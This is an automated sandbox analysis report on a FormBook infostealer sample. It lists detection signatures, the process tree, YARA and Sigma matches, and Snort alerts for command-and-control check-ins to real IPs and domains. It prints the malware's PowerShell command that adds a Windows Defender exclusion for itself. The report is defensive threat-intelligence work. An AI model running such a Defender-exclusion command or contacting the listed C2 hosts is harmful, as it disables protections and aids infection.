Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rPRESUPUESTO.exe

Overview

General Information

Sample name:rPRESUPUESTO.exe
Analysis ID:1465409
MD5:e78d43a26913cf101b98d1d04839eee2
SHA1:911c8c10f7c8bc9fd3c6bd16e9f5da11e3c3eb5d
SHA256:8f9dbdd77e130b7238761966a9c9aa8712baf2100ddebc3d9d206ee17f8f119c
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rPRESUPUESTO.exe (PID: 3180 cmdline: "C:\Users\user\Desktop\rPRESUPUESTO.exe" MD5: E78D43A26913CF101B98D1D04839EEE2)
    • powershell.exe (PID: 7092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1272 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • rPRESUPUESTO.exe (PID: 5144 cmdline: "C:\Users\user\Desktop\rPRESUPUESTO.exe" MD5: E78D43A26913CF101B98D1D04839EEE2)
      • MqDMLUHvZmSMqiwTfIsHo.exe (PID: 5908 cmdline: "C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ktmutil.exe (PID: 6608 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • MqDMLUHvZmSMqiwTfIsHo.exe (PID: 3608 cmdline: "C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4268 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ace0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x143ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x37a22:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x21141:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.rPRESUPUESTO.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.rPRESUPUESTO.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d373:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16a92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.rPRESUPUESTO.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.rPRESUPUESTO.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e173:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17892:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPRESUPUESTO.exe", ParentImage: C:\Users\user\Desktop\rPRESUPUESTO.exe, ParentProcessId: 3180, ParentProcessName: rPRESUPUESTO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", ProcessId: 7092, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPRESUPUESTO.exe", ParentImage: C:\Users\user\Desktop\rPRESUPUESTO.exe, ParentProcessId: 3180, ParentProcessName: rPRESUPUESTO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", ProcessId: 7092, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPRESUPUESTO.exe", ParentImage: C:\Users\user\Desktop\rPRESUPUESTO.exe, ParentProcessId: 3180, ParentProcessName: rPRESUPUESTO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", ProcessId: 7092, ProcessName: powershell.exe

            Snort Signatures

            Timestamp:07/01/24-16:16:13.746309
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:16:18.808053
            SID:2855465
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:07.346515
            SID:2855464
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:15.863521
            SID:2855464
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:21.028651
            SID:2855464
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:07.337585
            SID:2855465
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:29.248940
            SID:2855464
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:28.632405
            SID:2855465
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:34.312062
            SID:2855465
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:19:16.252042
            SID:2855464
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:19:02.638028
            SID:2855464
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:19:10.587031
            SID:2855465
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:16:11.211715
            SID:2855464
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:51.373471
            SID:2855464
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:16:24.966593
            SID:2855464
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:19:18.868394
            SID:2855464
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:37.901423
            SID:2855464
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:02.095932
            SID:2855464
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:42.922320
            SID:2855464
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:56.643054
            SID:2855464
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:13.324881
            SID:2855464
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:15:49.808806
            SID:2855465
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:56.437958
            SID:2855465
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:09.886069
            SID:2855464
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:19:05.500678
            SID:2855464
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:01.702274
            SID:2855465
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:54.095976
            SID:2855464
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:14.951993
            SID:2855465
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:40.379960
            SID:2855464
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:23.559109
            SID:2855464
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:48.836010
            SID:2855464
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:16:27.495389
            SID:2855464
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:47.997961
            SID:2855465
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:35.366412
            SID:2855464
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:26.707967
            SID:2855464
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:17:20.934301
            SID:2855465
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:18:43.039994
            SID:2855465
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:16:32.561088
            SID:2855465
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-16:16:59.555818
            SID:2855464
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.genesiestudios.online/s29p/Avira URL Cloud: Label: malware
            Source: http://www.genesiestudios.onlineAvira URL Cloud: Label: malware
            Source: http://www.gsdaluan.shop/8urb/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: rPRESUPUESTO.exeReversingLabs: Detection: 68%
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: rPRESUPUESTO.exeJoe Sandbox ML: detected
            Source: rPRESUPUESTO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: rPRESUPUESTO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251157795.000000000098E000.00000002.00000001.01000000.0000000D.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000000.2398762392.000000000098E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: gESw.pdb source: rPRESUPUESTO.exe
            Source: Binary string: wntdll.pdbUGP source: rPRESUPUESTO.exe, 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2330777913.0000000002976000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2328626906.00000000027CA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gESw.pdbSHA256 source: rPRESUPUESTO.exe
            Source: Binary string: wntdll.pdb source: rPRESUPUESTO.exe, rPRESUPUESTO.exe, 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000009.00000003.2330777913.0000000002976000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2328626906.00000000027CA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdbGCTL source: rPRESUPUESTO.exe, 00000005.00000002.2328360185.0000000001347000.00000004.00000020.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587226649.0000000001028000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdb source: rPRESUPUESTO.exe, 00000005.00000002.2328360185.0000000001347000.00000004.00000020.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587226649.0000000001028000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0019C0E0 FindFirstFileW,FindNextFileW,FindClose,9_2_0019C0E0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then xor eax, eax9_2_00189780
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then mov ebx, 00000004h9_2_02A10548

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49722 -> 122.10.13.122:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49727 -> 109.123.121.243:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49728 -> 109.123.121.243:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49731 -> 109.123.121.243:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49733 -> 47.242.109.15:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49734 -> 47.242.109.15:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49737 -> 47.242.109.15:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49739 -> 121.254.178.238:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49740 -> 121.254.178.238:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49742 -> 121.254.178.238:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49743 -> 203.161.62.199:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49744 -> 203.161.62.199:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49746 -> 203.161.62.199:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49747 -> 74.208.236.72:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49748 -> 74.208.236.72:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49750 -> 74.208.236.72:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49751 -> 192.207.62.21:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49752 -> 192.207.62.21:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49754 -> 192.207.62.21:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49755 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49756 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49758 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49759 -> 45.207.12.95:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49760 -> 45.207.12.95:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49762 -> 45.207.12.95:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49763 -> 81.95.96.29:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49764 -> 81.95.96.29:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49766 -> 81.95.96.29:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49767 -> 103.224.182.246:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49768 -> 103.224.182.246:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49770 -> 103.224.182.246:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49771 -> 72.52.179.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49772 -> 72.52.179.174:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49774 -> 72.52.179.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49775 -> 192.227.175.142:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49776 -> 192.227.175.142:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49778 -> 192.227.175.142:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49779 -> 31.186.11.254:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49780 -> 31.186.11.254:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.quantumvoil.xyz
            Source: Joe Sandbox ViewIP Address: 192.207.62.21 192.207.62.21
            Source: Joe Sandbox ViewIP Address: 72.52.179.174 72.52.179.174
            Source: Joe Sandbox ViewIP Address: 72.52.179.174 72.52.179.174
            Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
            Source: Joe Sandbox ViewASN Name: HOSTBREWUS HOSTBREWUS
            Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 14:18:21 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4981Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5c cd 73 1b b7 92 3f 2b 55 f9 1f 10 ba 1c 59 b5 02 bf f4 2d 4b ca 73 6c e5 3d af e3 8f 8d bc 49 6d 2e 2e cc 0c 48 42 9c 01 e6 01 33 14 c9 3c df 77 ab d6 f7 cd fa b2 3a fa a0 ca 61 6f af ea e5 42 e9 ff da 06 30 43 ce 0c 87 12 a9 8f ac f3 e1 84 d4 0c 06 e8 6e 00 dd bf ee 06 c0 d9 eb 44 81 7f f0 e9 27 9f 7e b2 d7 a1 c4 83 ab a5 3d 87 28 8a 3a 92 b6 f6 2b b5 8a 29 09 68 44 90 db 21 52 d1 68 bf 12 47 2d bc 5d 31 8d 96 f6 22 16 f9 f4 e0 d1 e3 d7 4f bf 3d 44 cd f5 55 a4 aa b2 2a aa 7b 35 fb c0 56 32 ed 39 09 e8 7e a5 c7 e8 49 28 64 54 41 ae e0 11 e5 40 ef 84 79 51 67 df a3 3d e6 52 6c 6e 56 11 e3 2c 62 c4 c7 ca 25 3e dd 6f 64 c4 b0 64 9e d1 c1 89 90 9e ca 90 99 aa f3 84 2a 57 b2 30 62 82 67 aa 4d 89 3a d5 ee 51 1c 75 84 5c a8 c9 cb 13 4e 2f 6d 81 d2 f1 fa 0c 63 d4 22 d0 55 c1 91 8a 88 8c 10 c6 86 9a cf 78 17 49 ea ef 57 48 18 fa 14 47 22 76 3b 